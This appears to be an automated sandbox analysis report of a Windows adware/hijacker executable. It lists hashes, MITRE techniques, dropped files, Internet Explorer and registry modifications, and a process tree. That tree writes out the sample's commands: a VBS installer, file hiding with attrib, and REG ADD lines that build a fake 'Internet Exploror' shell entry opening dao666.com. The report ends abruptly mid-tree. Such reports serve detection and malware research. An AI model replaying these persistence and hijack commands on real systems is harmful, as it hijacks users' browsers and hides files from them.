58d9d7de14a8c078bab40710f774f92b816d4fb673667a505c9514421bad4a15

Analysis

max time kernel
147s
max time network
142s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
22-01-2024 17:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6fe34764ef503418c24a3be3f842aab2.exe
Size

444KB
MD5

6fe34764ef503418c24a3be3f842aab2
SHA1

bdfa94aec5ace9471336b4e2ff63aab1eefeebd4
SHA256

58d9d7de14a8c078bab40710f774f92b816d4fb673667a505c9514421bad4a15
SHA512

eae88a86cd9410a76be3e449c6309ec8cc04c224faf5c56217acc5c3e8c5ad2bfcc2565cfe46398edca94a8807080a2523a9254f4fdbff745ebc57c26fdc3778
SSDEEP

12288:wutrzh9xOXk7GMHOJxl/0z+uoqzBTQGtec:wutr5OUStD/0zpJd

Score

8^/10

evasion persistence

Malware Config

Signatures

Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003

Sets file to hidden 1 TTPs 6 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
600	attrib.exe
2340	attrib.exe
568	attrib.exe
1080	attrib.exe
1804	attrib.exe
904	attrib.exe

Executes dropped EXE 3 IoCs

pid	Process
2888	msn.exe
1380	Gaicia.exe
1824	Gaicia.exe

Loads dropped DLL 14 IoCs

pid	Process
2008	cmd.exe
2888	msn.exe
2888	msn.exe
2888	msn.exe
2888	msn.exe
2888	msn.exe
1380	Gaicia.exe
1380	Gaicia.exe
1380	Gaicia.exe
2888	msn.exe
2888	msn.exe
1824	Gaicia.exe
1824	Gaicia.exe
1824	Gaicia.exe

Drops file in Program Files directory 21 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows\360SE.vbs	cmd.exe
File created	C:\Program Files\Windows\36OSE.vbs	cmd.exe
File created	C:\Program Files\WinWare\361.cmd	cmd.exe
File created	C:\Program Files\WinWare\36OSE.vbs	cmd.exe
File created	C:\Program Files\WinWare\Internet Exploror.lnk	cmd.exe
File opened for modification	C:\Program Files\WinWare\361.cmd	attrib.exe
File opened for modification	C:\Program Files\WinWare\36OSE.vbs	cmd.exe
File opened for modification	C:\Program Files\WinWare\tool.cmd	attrib.exe
File opened for modification	C:\Program Files\Windows\36OSE.vbs	cmd.exe
File opened for modification	C:\Program Files\WinWare\360SE.vbs	cmd.exe
File opened for modification	C:\Program Files\WinWare\360.cmd	attrib.exe
File created	C:\Program Files\Windows\360SE.vbs	cmd.exe
File opened for modification	C:\Program Files\WinWare\winare.vbs	cmd.exe
File created	C:\Program Files\WinWare\360.cmd	cmd.exe
File opened for modification	C:\Program Files\WinWare\360.cmd	cmd.exe
File created	C:\Program Files\WinWare\360SE.vbs	cmd.exe
File opened for modification	C:\Program Files\WinWare\Internet Exploror.lnk	cmd.exe
File created	C:\Program Files\WinWare\winare.vbs	cmd.exe
File created	C:\Program Files\WinWare\tool.cmd	cmd.exe
File opened for modification	C:\Program Files\WinWare\tool.cmd	cmd.exe
File opened for modification	C:\Program Files\WinWare\361.cmd	cmd.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\Mail\UltraEdit\is.cmd	cmd.exe
File opened for modification	C:\Windows\Mail\UltraEdit\is.cmd	cmd.exe
File created	C:\Windows\Mail\UltraEdit\winare.vbs	cmd.exe
File opened for modification	C:\Windows\Mail\UltraEdit\winare.vbs	cmd.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2824	sc.exe
2852	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 34 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{E85822C1-B94B-11EE-9C0C-D6882E0F4692} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 10b1f5bc584dda01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000566b58630fb3a044b91770fce5e9b2d600000000020000000000106600000001000020000000544c1e38a3985c4d7865e7fad4f257644e403e233181bfca35ae2f4833ac0d81000000000e800000000200002000000015bea4e5cb63c93d0a764a4511dd4694c449af3bd2d30ce56cb5d8f385b516de20000000b81488541f2b6e31db4cd71c1d599c2cac2d30e2cd84b260467f0fd85077986340000000f1aab2ae62f0ddf0d2ee8691ef96dd95a2c4de5b8ce3e1eac02bc1929501e9e8f76905252312d52ba680558959863cd6aaefa4ceaa445b2d61efa59bf4d9db0c	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000566b58630fb3a044b91770fce5e9b2d600000000020000000000106600000001000020000000fea3317bb32b1b6677a864e89625c475c9dea3db147da4cd13f06d1ef2a26110000000000e8000000002000020000000e34df0284249430b4124ff694ce80782fcd0c87931ab55acc45dc8e71d8c7f0f90000000dfa21d84fbb106120b492ac72f16c6e0a2f457ddf6e0d373fd8668cd4daba0693a95c6bb0e18d294ef1347964c16f37eaf848d79c13cd45434f6821fc09d9b498c792dcbf9e7e36d243260bfac7afa5dc1780fe3f9d13a4af069057d137bca09dfbf11576be30770d5730381c6066e51f14fddb8e15085f927777479ff2856c859b825ddddd067ff2e886a6ccc49b3884000000017fabad7cedb3257ebf235d361151f78b72b580ffa38fb9a3a1a88f00373cbe621a00ee829829f51877bb3dba00fb0776b3971925500e6b1b8c9a52727070490	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "412106484"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE

Modifies registry class 44 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\WantsParsDisplayName	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command\ = "C:\\progra~1\\Intern~1\\iexplore.exe http://www.dao666.com/?in"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ = "%systemRoot%\\SysWow64\\shdocvw.dll"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ThreadingModel = "Apartment"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command\ = "C:\\progra~1\\Intern~1\\iexplore.exe http://www.dao666.com/?in"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\HideOnDesktopPerUser	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\Attributes = "0"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\ = "┤≥┐¬╓≈╥│(&H)"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\LocalizedString = "Internet Exploror"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\HideFolderVerbs	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InfoTip = "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\ = "shdoclc.dll,0"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\MUIVerb = "@shdoclc.dll,-10241"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder	reg.exe

Runs net.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3012	iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
3012	iexplore.exe
3012	iexplore.exe
2916	IEXPLORE.EXE
2916	IEXPLORE.EXE
2916	IEXPLORE.EXE
2916	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1652 wrote to memory of 2700	1652	6fe34764ef503418c24a3be3f842aab2.exe	28
PID 1652 wrote to memory of 2700	1652	6fe34764ef503418c24a3be3f842aab2.exe	28
PID 1652 wrote to memory of 2700	1652	6fe34764ef503418c24a3be3f842aab2.exe	28
PID 1652 wrote to memory of 2700	1652	6fe34764ef503418c24a3be3f842aab2.exe	28
PID 1652 wrote to memory of 2700	1652	6fe34764ef503418c24a3be3f842aab2.exe	28
PID 1652 wrote to memory of 2700	1652	6fe34764ef503418c24a3be3f842aab2.exe	28
PID 1652 wrote to memory of 2700	1652	6fe34764ef503418c24a3be3f842aab2.exe	28
PID 2700 wrote to memory of 2884	2700	WScript.exe	29
PID 2700 wrote to memory of 2884	2700	WScript.exe	29
PID 2700 wrote to memory of 2884	2700	WScript.exe	29
PID 2700 wrote to memory of 2884	2700	WScript.exe	29
PID 2700 wrote to memory of 2884	2700	WScript.exe	29
PID 2700 wrote to memory of 2884	2700	WScript.exe	29
PID 2700 wrote to memory of 2884	2700	WScript.exe	29
PID 2884 wrote to memory of 3012	2884	cmd.exe	31
PID 2884 wrote to memory of 3012	2884	cmd.exe	31
PID 2884 wrote to memory of 3012	2884	cmd.exe	31
PID 2884 wrote to memory of 3012	2884	cmd.exe	31
PID 2700 wrote to memory of 2292	2700	WScript.exe	32
PID 2700 wrote to memory of 2292	2700	WScript.exe	32
PID 2700 wrote to memory of 2292	2700	WScript.exe	32
PID 2700 wrote to memory of 2292	2700	WScript.exe	32
PID 2700 wrote to memory of 2292	2700	WScript.exe	32
PID 2700 wrote to memory of 2292	2700	WScript.exe	32
PID 2700 wrote to memory of 2292	2700	WScript.exe	32
PID 2292 wrote to memory of 2612	2292	cmd.exe	34
PID 2292 wrote to memory of 2612	2292	cmd.exe	34
PID 2292 wrote to memory of 2612	2292	cmd.exe	34
PID 2292 wrote to memory of 2612	2292	cmd.exe	34
PID 2292 wrote to memory of 2612	2292	cmd.exe	34
PID 2292 wrote to memory of 2612	2292	cmd.exe	34
PID 2292 wrote to memory of 2612	2292	cmd.exe	34
PID 2292 wrote to memory of 2672	2292	cmd.exe	35
PID 2292 wrote to memory of 2672	2292	cmd.exe	35
PID 2292 wrote to memory of 2672	2292	cmd.exe	35
PID 2292 wrote to memory of 2672	2292	cmd.exe	35
PID 2292 wrote to memory of 2672	2292	cmd.exe	35
PID 2292 wrote to memory of 2672	2292	cmd.exe	35
PID 2292 wrote to memory of 2672	2292	cmd.exe	35
PID 3012 wrote to memory of 2916	3012	iexplore.exe	36
PID 3012 wrote to memory of 2916	3012	iexplore.exe	36
PID 3012 wrote to memory of 2916	3012	iexplore.exe	36
PID 3012 wrote to memory of 2916	3012	iexplore.exe	36
PID 3012 wrote to memory of 2916	3012	iexplore.exe	36
PID 3012 wrote to memory of 2916	3012	iexplore.exe	36
PID 3012 wrote to memory of 2916	3012	iexplore.exe	36
PID 2292 wrote to memory of 2252	2292	cmd.exe	37
PID 2292 wrote to memory of 2252	2292	cmd.exe	37
PID 2292 wrote to memory of 2252	2292	cmd.exe	37
PID 2292 wrote to memory of 2252	2292	cmd.exe	37
PID 2292 wrote to memory of 2252	2292	cmd.exe	37
PID 2292 wrote to memory of 2252	2292	cmd.exe	37
PID 2292 wrote to memory of 2252	2292	cmd.exe	37
PID 2292 wrote to memory of 2160	2292	cmd.exe	38
PID 2292 wrote to memory of 2160	2292	cmd.exe	38
PID 2292 wrote to memory of 2160	2292	cmd.exe	38
PID 2292 wrote to memory of 2160	2292	cmd.exe	38
PID 2292 wrote to memory of 2160	2292	cmd.exe	38
PID 2292 wrote to memory of 2160	2292	cmd.exe	38
PID 2292 wrote to memory of 2160	2292	cmd.exe	38
PID 2292 wrote to memory of 1852	2292	cmd.exe	39
PID 2292 wrote to memory of 1852	2292	cmd.exe	39
PID 2292 wrote to memory of 1852	2292	cmd.exe	39
PID 2292 wrote to memory of 1852	2292	cmd.exe	39

Views/modifies file attributes 1 TTPs 6 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
600	attrib.exe
2340	attrib.exe
568	attrib.exe
1080	attrib.exe
1804	attrib.exe
904	attrib.exe

C:\Users\Admin\AppData\Local\Temp\6fe34764ef503418c24a3be3f842aab2.exe
"C:\Users\Admin\AppData\Local\Temp\6fe34764ef503418c24a3be3f842aab2.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1652
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install_7xdown.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2700
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C start /min iexplore http://dao666.com/index2.html?7xdown
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2884
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://dao666.com/index2.html?7xdown
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:3012
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3012 CREDAT:275457 /prefetch:2
        5⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:2916
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\tool.cmd
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2292
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      Modifies registry class
      PID:2612
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "InfoTip" /t REG_SZ /d "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛" /f
      4⤵
      Modifies registry class
      PID:2672
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "LocalizedString" /t REG_SZ /d "Internet Exploror" /f
      4⤵
      Modifies registry class
      PID:2252
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon"
      4⤵
      Modifies registry class
      PID:2160
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f
      4⤵
      Modifies registry class
      PID:1852
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32"
      4⤵
      Modifies registry class
      PID:2972
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /ve /t REG_SZ /d "%systemRoot%\system32\shdocvw.dll" /f
      4⤵
      Modifies registry class
      PID:2976
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f
      4⤵
      Modifies registry class
      PID:2992
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell"
      4⤵
      Modifies registry class
      PID:3008
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell" /ve /t REG_SZ /d "┤≥┐¬╓≈╥│(&H)" /f
      4⤵
      Modifies registry class
      PID:2140
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)"
      4⤵
      Modifies registry class
      PID:1640
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f
      4⤵
      Modifies registry class
      PID:1192
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command"
      4⤵
      Modifies registry class
      PID:2776
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://www.dao666.com/?in" /f
      4⤵
      Modifies registry class
      PID:2844
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)"
      4⤵
      Modifies registry class
      PID:1092
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command"
      4⤵
      Modifies registry class
      PID:1292
  - - C:\Windows\SysWOW64\reg.exe
